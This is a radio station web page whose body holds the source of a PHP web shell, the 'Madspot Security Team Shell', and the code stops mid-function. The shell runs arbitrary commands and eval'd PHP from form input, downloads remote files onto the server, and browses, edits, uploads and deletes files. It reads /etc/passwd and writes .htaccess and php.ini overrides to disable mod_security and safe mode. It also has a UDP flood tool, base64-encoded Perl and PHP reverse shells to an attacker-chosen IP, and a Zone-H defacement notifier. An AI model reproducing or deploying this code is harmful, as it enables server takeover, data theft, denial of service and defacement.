Listen Live

Weather

Live Appearances

Date Time Location Who
There are no live appearances currently scheduled.

Save Free Radio!

PEG Broadcasting

Contests

sse

/**
* @author Ikram ALI
* @copyright 2012
*/
@define('VERSION','1.0');
@error_reporting(E_ALL ^ E_NOTICE);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()) {
function madstripslashes($array) {
return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
}
$_POST = madstripslashes($_POST);
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
$sys='win';
else
$sys='unix';

$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);

$cwd = @getcwd();
if($sys == 'win')
{
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}

if($cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';


function madEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
$down=@getcwd();
if($sys=="win")
$down.='\\';
else
$down.='/';
if(isset($_POST['rtdown']))
{
$url = $_POST['rtdown'];
$newfname = $down. basename($url);
$file = fopen ($url, "rb");
if ($file) {
$newf = fopen ($newfname, "wb");
if ($newf)
while(!feof($file)) {
fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
}
}

if ($file) {
fclose($file);
}
if ($newf) {
fclose($newf);
}
}



function madhead()
{
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];

$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;

$on="0F0> ON ";
$of=" OFF ";
$none="0F0> NONE ";
if(function_exists('curl_version'))
$curl=$on;
else
$curl=$of;
if(function_exists('mysql_get_client_info'))
$mysql=$on;
else
$mysql=$of;
if(function_exists('mssql_connect'))
$mssql=$on;
else
$mssql=$of;

if(function_exists('pg_connect'))
$pg=$on;
else
$pg=$of;
if(function_exists('oci_connect'))
$or=$on;
else
$or=$of;
if(@ini_get('disable_functions'))
$disfun=@ini_get('disable_functions');
else
$disfun="All Functions Enable";
if(@ini_get('safe_mode'))
$safe_modes="ON";
else
$safe_modes="0F0 >OFF";
if(@ini_get('open_basedir'))
$open_b=@ini_get('open_basedir');
else
$open_b=$none;


if(@ini_get('safe_mode_exec_dir'))
$safe_exe=@ini_get('safe_mode_exec_dir');
else
$safe_exe=$none;
if(@ini_get('safe_mode_include_dir'))
$safe_include=@ini_get('safe_mode_include_dir');
else
$safe_include=$none;
if(!function_exists('posix_getegid'))
{
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else
{
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}


$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= " $cwd_links .= "\")'>".$path[$i]."/";
}

$drives = "";
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ] ';





echo '




Madspot Security Team Shell


';

echo "";


echo '


000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">



































';

if($GLOBALS['sys']=='unix' )
{
if(!@ini_get('safe_mode'))
{

echo '



';

}
else
{
echo '

';
}
}
else
{
echo '


';

}


echo '











';
if($GLOBALS[sys]=="win")
{
echo '


';
}

echo '



Uname: '.substr(@php_uname(), 0, 120).'
User: '. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ] ""
PHP: '.@phpversion(). ' Safe Mode:'.$safe_modes.'
Our IP: '.@$_SERVER["SERVER_ADDR"].' Server IP: '.@$_SERVER["REMOTE_ADDR"].'
WEBS: ';

if($GLOBALS['sys']=='unix')
{
$d0mains = @file("/etc/named.conf");
if(!$d0mains)
{
echo "CANT READ named.conf";
}
else
{
$count;
foreach($d0mains as $d0main)
{
if(@ereg("zone",$d0main))
{
preg_match_all('zone "(.*)"', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;
}
}
}
echo "$count Domains";
}
}
else{ echo"CANT READ |Windows|";}

echo '
HDD: '.madSize($totalSpace).' Free:' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
Useful : ';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
foreach($userful as $item)
if(madWhich($item))
echo $item.',';
echo '
Downloader:';

$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
foreach($downloaders as $item2)
if(madWhich($item2))
echo $item2.',';
echo '
useful:';
echo '--------------
Downloader: -------------
Window:';
echo madEx('ver');
echo '
Downloader: -------------
Disabled functions:'.$disfun.'
cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: '.$or.''.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'
Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'
Server '.@getenv('SERVER_SOFTWARE').'
DRIVE: '.$drives.'
PWD: '.$cwd_links.' onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">|CURRENT|



';

}

function madfooter()
{

echo "
















__MK FILE__
__MK DIR__
__DELETE__
__CHMOD__
__CHANGE DIR__
__HTTP DOWNLOAD__
__EXECUTE__





Upload file:





";

}
if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
function posix_getgrgid($p) {return false;} }

function madWhich($p) {
$path = madEx('which ' . $p);
if(!empty($path))
return $path;
return false;
}



function madSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}


function madPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function madPermsColor($f) {
if (!@is_readable($f))
return 'FF0000>' . madPerms(@fileperms($f)) . '';
elseif (!@is_writable($f))
return '' . madPerms(@fileperms($f)) . '';
else
return '25ff00>' . madPerms(@fileperms($f)) . '';
}

if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}


function madFilesMan() {
madhead();
echo '
';
if(!empty($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_dir(@$_POST['p2']))
deleteDir(@$_POST['p2']);
else
@unlink(@$_POST['p2']);
break;
default:
if(!empty($_POST['p1'])) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['c'] = @$_POST['c'];
}
break;
}
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo '

| Access Denied! |

';madFooter(); return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "

";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
echo '';
$l = $l?0:1;
}
echo "
NameSizeModifyOwner/GroupPermissionsActions
onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '>| ' . htmlspecialchars($f['name']) . ' |').''.(($f['type']=='file')?madSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].' onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'
" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T'.(($f['type']=='file')?' " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D':'').'" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X




";


madfooter();
}

function madFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else
header("Content-Type: application/octet-stream");
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}

madhead();
echo '
';
if( !file_exists(@$_POST['p1']) ) {
echo "
FILE DOEST NOT EXITS 
";
madFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' Permission: '.madPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo '
';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ' onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?' '.$v.' ':$v).' ';
echo '

';
switch($_POST['p2']) {
case 'view':
echo '
';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '
';
break;
case 'highlight':
if( @is_readable($_POST['p1']) ) {
echo '
e1e1e1;color:black;">';
$code = @highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$code).'
';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
';
}
clearstatcache();
echo '
>">
';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'],1);
$fp = @fopen($_POST['p1'],"w");
if($fp) {
@fwrite($fp,$_POST['p3']);
@fclose($fp);
echo 'Saved!
';
@touch($_POST['p1'],$time,$time);
}
}
echo '
>">
';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
$h[1] .= '
';
$h[2] .= "\n";
}
}
echo '
'.$h[0].'
282828>
'.$h[1].'
333333>
'.htmlspecialchars($h[2]).'
';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
';
else
die('');
}
echo '
>">
';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(!touch($_POST['p1'],$time,$time))
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '
>">
';
break;
}
echo '
';
madFooter();
}

function madphpeval()
{
madhead();

if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
echo '
';
ob_start();
$INI=ini_get_all();
print ''
.''
.''
.''
.'';
foreach ($INI as $param => $values)
print "\n".''
.''
.''
.''
.'';
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('
';
}

if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
echo '
';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('
';
}

if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
echo '
';
ob_start();
$EXT=get_loaded_extensions ();
print '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].'
'."\n".'
'
.implode('
', $EXT)
.'
'
.count($EXT).' extensions loaded';


echo '

';
}


if(empty($_POST['ajax']) && !empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
echo '
onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo | onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |

';
echo '
';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '
';

madfooter();
}

function madhash()
{
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i $stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'Htmlspecialchars' => 'htmlspecialchars',

);

madhead();
echo '
';
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "

";
if(!empty($_POST['p1'])) {
if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo "
";
madFooter();

}
function maddos()
{
madhead();
echo '
';
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '
| UDP DOSSIER |

Host :Time :Port :>" />
';
echo "
";
if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
{
$packets=0;
ignore_user_abort(true);
$exec_time=$_POST['p2'];
$time=time();
$max_time=$exec_time+$time;
$host=$_POST['p1'];
$portudp=$_POST['p3'];
for($i=0;$i<65000;$i++)
{
$out .= 'X';
}
while(1){

$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
echo "
";
}

echo '
';

madfooter();
}

function madproc()
{
madhead();
echo "
";
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
if($GLOBALS['sys']=="win")
{
$process=array(
"System Info" =>"systeminfo",
"Active Connections" => "netstat -an",
"Running Services" => "net start",
"User Accounts" => "net user",
"Show Computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
}
else
{
$process=array(
"Process status" => "ps aux",
"Syslog" =>"cat /etc/syslog.conf",
"Resolv" => "cat /etc/resolv.conf",
"Hosts" =>"cat /etc/hosts",
"Passwd" =>"cat /etc/passwd",
"Cpuinfo"=>"cat /proc/cpuinfo",
"Version"=>"cat /proc/version",
"Sbin"=>"ls -al /usr/sbin",
"Interrupts"=>"cat /proc/interrupts",
"lsattr"=>"lsattr -va",
"Uptime"=>"uptime",
"Fstab" =>"cat /etc/fstab",
"HDD Space" => "df -h"
);}

foreach($process as $n => $link)
{
echo '" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | ';
}
echo "
";
if(!empty($_POST['p1']))
{
echo "
";
echo madEx($_POST['p1']);
echo '
';
}
echo "
";
madfooter();
}

function madsafe()
{
madhead();
echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |
";
echo ' onclick="g(null,null,\'php.ini\',null)">| PHP.INI | onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) |
';
if(!empty($_POST['p2']) && isset($_POST['p2']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'
Sec------Engine Off
Sec------ScanPOST Off
');
fclose($fil);
}
if(!empty($_POST['p1'])&& isset($_POST['p1']))
{
$fil=fopen($GLOBALS['cwd']."php.ini","w");
fwrite($fil,'safe_mode=OFF
disable_functions=NONE');
fclose($fil);
}
if(!empty($_POST['p3']) && isset($_POST['p3']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl');
fclose($fil);
}
echo "
";
madfooter();

}

function madconnect()
{
madhead();
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
echo "

| PERL AND PHP(threads) BACK CONNECT |

";
echo "
PERL BACK CONNECT
IP: Port:
";
echo "
PHP BACK CONNECT
IP: Port:
";
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w = @fopen($f,"w") or @function_exists('file_put_contents');
if($w){
@fwrite($w,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
echo "
Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."
Connecting...
";
@unlink("/tmp/bc.pl");
}
if($_POST['p1']=='php')
{

@set_time_limit (0);
$ip = $_POST['p2'];
$port =$_POST['p3'];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
echo "
";

if (function_exists('pcntl_fork')) {

$pid = pcntl_fork();

if ($pid == -1) {
echo "Cant fork!
";
exit(1);
}

if ($pid) {
exit(0);
}

if (posix_setsid() == -1) {
echo "Error: Can't setsid()
";
exit(1);
}

$daemon = 1;
} else {
echo "WARNING: Failed to daemonise. This is quite common and not fatal
";
}

chdir("/");

umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "$errstr ($errno)";
exit(1);
}


$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
echo "ERROR: Can't spawn shell
";
exit(1);
}


@stream_set_blocking($pipes[0], 0);
@stream_set_blocking($pipes[1], 0);
@stream_set_blocking($pipes[2], 0);
@stream_set_blocking($sock, 0);

echo "Successfully opened reverse shell to $ip:$port
";

while (1) {
if (feof($sock)) {
echo "ERROR: Shell connection terminated
";
break;
}

if (feof($pipes[1])) {
echo "ERROR: Shell process terminated
";
break;
}


$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);

if (in_array($sock, $read_a)) {
if ($debug) echo "SOCK READ
";
$input=fread($sock, $chunk_size);
if ($debug) echo "SOCK: $input
";
fwrite($pipes[0], $input);
}

if (in_array($pipes[1], $read_a)) {
if ($debug) echo "STDOUT READ
";
$input = fread($pipes[1], $chunk_size);
if ($debug) echo "STDOUT: $input
";
fwrite($sock, $input);
}


if (in_array($pipes[2], $read_a)) {
if ($debug) echo "STDERR READ
";
$input = fread($pipes[2], $chunk_size);
if ($debug) echo "STDERR: $input
";
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

echo "
";
}

}
echo "
";
madfooter();
}
function ZoneH($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
function madzoneh()
{
madhead();
if(!function_exists('curl_version'))
{
echo "
PHP CURL NOT EXIT
";
}
echo "

";
echo '

|ZONE-H MASS DEFACER |



| Notifier |










>" />
';
if(isset($_POST['p1']) && isset($_POST['p2']))
{
$hacker =$_POST['p1'];
$method =$_POST['p2'];
$neden ="Not available";
$site =$_POST['p3'];
$i = 0;
$sites = explode("\n", $site);
echo "
";
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http")
{
$sites[$i] = "http://".$sites[$i];
}
ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
echo "Site : ".$sites[$i]." Defaced !
";
++$i;
}

"Sending Sites To Zone-H Has Been Completed Successfully !!
";
}
echo "
";
madfooter();

}
function madspot()
{
madhead();
echo "
";
echo "


|`-:_
,----....____ | `+.
( ````----....|___ |
\ _ ````----....____
\ _) Coded By: Ikram Ali ```---.._
\ \
)`.\ )`. )`. )`. )`. )`. )`. )`. )`. )`. )hh
-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `
Madspot is a Team of professional Ethical Hackers From Pakistan.
We have Years of Experience in Security, Penetration & Coding
And can Break and Secure.

Version 1.0

Contact : http://www.madspot.net

if you found bug contact our team




.=''=.
/ _ _ \
| d b |
\ /\ /
,/'-=\/=-'\,
/ / \ \ -----------------------------
| / Zahid \ | Madspot Digital Security Team
\/ \ Rasheed/ \/ -----------------------------
'. .'
_|`~~`|_
/|\ /|\

.- -. .-====-. ,-------. .-=<>=-.
/_-\'''/-_\ / / '' \ \ |,-----.| /__----__\
|/ o) (o \| | | ')(' | | /,'-----'.\ |/ (')(') \|
\ ._. / \ \ / / {_/(') (')\_} \ __ /
,>-_,,,_-<. >'=jf='< `. _ .' ,'--__--'.
/ Waqar.Khan \ / \ /'-___-'\ / :| \
(_) . (_) / Ikram \ / M-Usman \ (_) :| (_)
\_-----'____--/ (_) Ali (_) (_)_______(_) |___:|____|
\___________/ |________| \_______/ | Afrasiab|





";
madfooter();

}

function madsymlink()
{
madhead();

$IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
$IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );




echo '

